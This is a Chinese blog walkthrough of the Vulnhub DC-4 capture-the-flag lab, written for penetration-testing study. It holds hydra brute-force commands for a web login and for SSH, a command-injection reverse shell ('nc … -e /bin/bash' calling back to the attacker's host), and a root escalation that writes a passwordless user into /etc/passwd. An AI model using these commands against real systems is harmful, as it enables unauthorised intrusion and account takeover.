Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)

最新推荐文章于 2024-05-09 17:08:28 发布
最新推荐文章于 2024-05-09 17:08:28 发布
阅读量2.4k 收藏 11
点赞数
分类专栏: Vulnhub-CTF 渗透测试 文章标签: 安全 网络 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45722813/article/details/121736441
版权

Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)

靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/
将下载好的靶机导入到VMware中,修改其网络模式为NAT模式,然后开启靶机
在这里插入图片描述
在kali攻击机进行主机发现,获取靶机的IP地址,使用工具arp-scan或者nmap都可以
在这里插入图片描述
注意: 如果发现不了靶机IP,则需要修改靶机的网络设置,参考文章https://blog.csdn.net/qq_45722813/article/details/121324686
发现靶机IP地址为192.168.172.144,现在使用nmap扫描靶机的操作系统和开放端口以及相应的服务,命令nmap -T4 -A -p- 192.168.172.144
在这里插入图片描述
靶机操作系统为基于Debian的linux,开放22端口ssh服务,80端口的http服务,服务器容器为nginx1.15.10
现在我们直接在kali即打开浏览器在地址栏输入http://192.168.172.144进行访问
在这里插入图片描述
是一个admin的登录界面,其他什么都没有,先试试SQL注入,好像没什么用,然后也没有验证码啥的,我们使用hydra工具进行爆破
在这里插入图片描述
得到admin账号的密码为happy,在admin的登录界面进行登录,发现有3个选项可以执行3个不同的命令
在这里插入图片描述
所以我们可以抓包进行任意命令执行的攻击,使用burpsuite进行抓包和改包
在这里插入图片描述
我们可以更改其命令为反弹shell的命令,现在kali机进行监听
在这里插入图片描述

将提交的参数改成nc反弹shell命令radio=nc 192.168.172.131 -e /bin/bash&submit=Run,这里的IP是我kali机的IP
在这里插入图片描述
然后点击【Forward】执行命令,可以看到kali机已经连接成功
在这里插入图片描述
使用命令python -c "import pty; pty.spawn('/bin/bash')"获取一个交互式shell
在这里插入图片描述

现在来一层一层地看各个目录的文件
在这里插入图片描述
想进入root目录但是没有权限,所以进入home目录看看,发现3个用户charles,jim和sam
在这里插入图片描述
进入各个目录查看,只在jim的目录下发现了一个目录和两个文件,进入backups目录,发现了一个old-passwords.bak文件
在这里插入图片描述
使用命令cat old-passwords.bak直接查看文件,然后将文件内容复制到kali机保存问old-passwords.txt文件,用于后面进行密码爆破
在这里插入图片描述
然后使用里面的密码对jim用户进行ssh登录爆破,命令hydra -l jim -P old-passwords.txt -t 6 ssh://192.168.172.144
在这里插入图片描述
爆破成功,接下来使用用户名jim和密码jibrl04进行ssh登录,我们发现除了问题,提示“192.168.172.144的主机密钥已更改,您已请求严格检查。主机密钥验证失败。”,不慌,我们输入命令ssh-keygen -R "靶机IP",目的是为了清楚当前机器里关于远程服务器的缓存和密钥信息,然后重新ssh登录即可
在这里插入图片描述
打开jim目录下的mbox文件查看,这是一封来自roo的邮件
在这里插入图片描述
然后去jim的邮件目录查看,打开/var/mail/jim文件发现了用户Charles的密码在这里插入图片描述
成功切换用户到charles
在这里插入图片描述

接下来需要提升权限,首先考虑suid提权,但是好像没有可以利用的命令
在这里插入图片描述
然后再考虑sudo提权,发现用户可以不需要输入密码即可以root权限执行teehee命令
在这里插入图片描述
teehee命令类似于tee,用于读取标准输入数据,并将其内容输出到文件,所以我们可以使用teehee命令将一个无密码的用户admin写入到/etc/passwd文件中,并将该用户添加到root组中
在这里插入图片描述
然后只需要切换到admin用户就是root权限了
在这里插入图片描述

最后只需要跳转到/root目录下就可以看到flag文件和内容了
在这里插入图片描述
参考文章:http://cn-sec.com/archives/379433.html

某某IT打工仔
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2078
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
【甄选靶场Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3103
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
DC-4靶机实验之burp suite使用
u013930899的博客
10-23 214
burp suite爆破网站登陆账号
网络安全最全Hydra密码爆破工具使用教程图文教程(超详细),2024年最新含泪整理面经
最新发布
2401_84254343的博客
05-09 1203
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。我们的密码字典中有三个密码,它也会执行三次,并把执行过程列了出来。
使用kali+hydra爆破win7用户密码
自知.的博客
03-19 3252
使用hydra暴力破解windows7的密码,适合网安小白学习。
Vulnhub靶场渗透-DC-4
paidx0
10-21 255
前言 靶机IP(192.168.110.134) 攻击机IP(192.168.110.127) 网络NAT模式 信息收集 访问80端口,提示以admin的用户名登录 直接爆破了,爆破结果是 admin:happy 漏洞利用 登录进去发现是个可以RCE的 思路是不是来了,很显然直接弹shell了 怎么弹shell就不多说了,我的靶场笔记很多都有写 存在三个用户 进入jim的backups文件夹发现了很多的旧密码,思路这不就又来了 开放ssh服务,很显然是要我们去爆破了 拿到jim的账号了,登
DC4靶机练习
LSYZWF的博客
04-23 371
文章目录1、查看靶机的mac地址2、打开网页发现了需要密账号和密码进行登录3、用户名admin,密码:happy进行登录4、ssh爆破5、登录成功后,查看相关文件6、提权 实验环境:DC-4靶机,kali攻击机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、查看靶机的mac地址 扫描C段网络 nmap -sP 192.168.246.130/24 -o nmap.sP 发现目标主机的ip地址为192.168.246
E010-渗透测试常用工具-使用Hydra进行密码破解.mhtml
10-24
E010-渗透测试常用工具-使用Hydra进行密码破解.mhtml
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;...
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
thc-hydra-windows-master爆破工具
05-12
爆破工具
hydra-8.2(windows).zip
06-24
首先hydra这个不是一个图形界面的软件,需要在命令行界面执行。但是连我这种英语小白都能用,大家就放心食用吧。 在hydra文件夹下按住shift点击鼠标右键,选择终端打开(win10是在此处打开powershell)。 ctrl+r ...
pikachu靶场练习——暴力破解
qq_42176496的博客
08-18 1129
pikachu暴力破解详解
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4574
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1863
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
dc-4 靶机渗透学习
..
03-19 3038
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
靶机渗透-Vulnhub-DC-4
dahege666的博客
02-05 253
下载地址: 1、链接:https://pan.baidu.com/s/1UldJRqM1zJTwq9YoAxwd4Q 提取码:e9o1 2、http://www.five86.com/downloads/DC-4.zip 3、https://download.vulnhub.com/dc/DC-4.zip 靶机:DC4(VMware桥接) IP:192.168.88.124 攻击机:Kali(VMware桥接) IP:192.168..88.109 先用nmap对目标主机进行...
Hydra(九头蛇)工具使用
热门推荐
剁椒鱼头没剁椒的博客
01-03 1万+
hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
Kali系列Hydra/Medusa mysql密码爆破
05-13
Hydra和Medusa是常用的密码爆破工具,可以用于测试弱密码。这里以MySQL为例进行演示。 首先,安装Hydra和Medusa。在Kali Linux中,可以使用以下命令安装: ``` sudo apt-get install hydra sudo apt-get install medusa ``` 然后,使用Hydra和Medusa进行MySQL密码爆破。以下是使用Hydra的命令示例: ``` hydra -L username.txt -P password.txt mysql://ip_address ``` 其中,`username.txt`和`password.txt`分别是用户名和密码的字典文件,`ip_address`是目标MySQL服务器的IP地址。执行该命令后,Hydra将尝试使用字典文件中的用户名和密码进行爆破。 另外,以下是使用Medusa的命令示例: ``` medusa -h ip_address -U username.txt -P password.txt -M mysql ``` 其中,`ip_address`是目标MySQL服务器的IP地址,`username.txt`和`password.txt`分别是用户名和密码的字典文件,`-M mysql`指定使用MySQL协议进行爆破。执行该命令后,Medusa将尝试使用字典文件中的用户名和密码进行爆破。 需要注意的是,在进行密码爆破测试时,需要获得授权并遵守法律法规,不得用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值